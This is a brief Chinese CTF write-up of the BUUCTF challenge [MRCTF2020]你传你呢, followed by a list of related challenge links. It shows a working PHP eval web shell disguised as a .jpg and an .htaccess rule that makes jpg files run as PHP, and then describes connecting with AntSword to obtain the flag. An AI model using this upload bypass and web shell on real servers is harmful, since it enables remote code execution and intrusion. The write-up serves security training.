BUUCTF---[MRCTF2020]你传你呢1

简介: BUUCTF---[MRCTF2020]你传你呢1

1.题目描述

2.打开题目链接

3.上传shell.jpg文件,显示连接成功,但是用蚁剑连接却连接不上。shell文件内容为

<script language='php'>eval($_REQUEST[cmd]);</script>

4.用bp抓包,修改属性

5.需要上传一个.htaccess的文件来把jpg后缀的文件全都当作php文件来执行,.htsccess文件内容为

AddType application/x-httpd-php .jpg

6.刚刚我们上传了shell.jpg

就接下来上传.htaccess文件,修改这里

7.接下来我们放包回去,点击forward

8.接下来我们访问shell.jpg文件

访问地址为

http://97d484a8-851f-4d4d-9507-aa835dd782f4.node5.buuoj.cn:81/upload/8d47dd0461a3a88317b0af687ebf8526/shell%20.jpg

9.接下来我们使用蚁剑连接

flag{3687354e-fb5d-415c-b5ec-0c92e80df3e4}
相关文章
BUUCTF LSB 1
BUUCTF LSB 1
355 0
|
Linux
BUU [安洵杯 2019]easy_web
BUU [安洵杯 2019]easy_web
241 0
BUUCTF---[ACTF2020 新生赛]BackupFile1
BUUCTF---[ACTF2020 新生赛]BackupFile1
|
SQL 数据库 数据安全/隐私保护
BUUCTF[极客大挑战 2019]EasySQL1
BUUCTF[极客大挑战 2019]EasySQL1
|
数据库 数据安全/隐私保护
BUUCTF---[极客大挑战 2019]BabySQL1
BUUCTF---[极客大挑战 2019]BabySQL1
|
SQL Python
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
1017 0
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
|
SQL 安全 数据库
[SUCTF 2019]EasySQL1 题目分析与详解
[SUCTF 2019]EasySQL1 题目分析与详解
|
Web App开发 Go PHP
BUUCTF---[极客大挑战 2019]Http1
BUUCTF---[极客大挑战 2019]Http1